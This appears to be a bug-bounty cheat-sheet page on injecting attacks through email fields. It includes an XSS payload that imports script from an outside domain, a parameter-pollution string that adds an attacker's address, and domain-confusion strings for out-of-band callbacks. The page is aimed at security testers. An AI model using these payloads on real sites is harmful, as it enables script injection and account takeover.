Email injections
Emails injection: XSS, SQLi, SSTI, etc.
Create multiple accounts with an alias email@bugcrowdninja.com email+1@bugcrowdninja.com email+2@bugcrowdninja.com
user[email][]=valid@email.com&user[email][]=attacker@email.comPunnycode
Check Email Registration
Registration FormParser Abuse - Domain confusion
oastify.com!collab\@example.com
collab%psres.net(@example.comXSS
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).
"><img/src/onerror=import('//domain/')>"@yourdomain.com
SSTI
SSRF
CRLF
CRLF InjectionPassword ResetRegister or reset password
SQL Injection
SQL InjectionCommand Injection
Command InjectionOpen Redirection
Bypass Access Control
HTML injection - Subscription form
Resources
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated
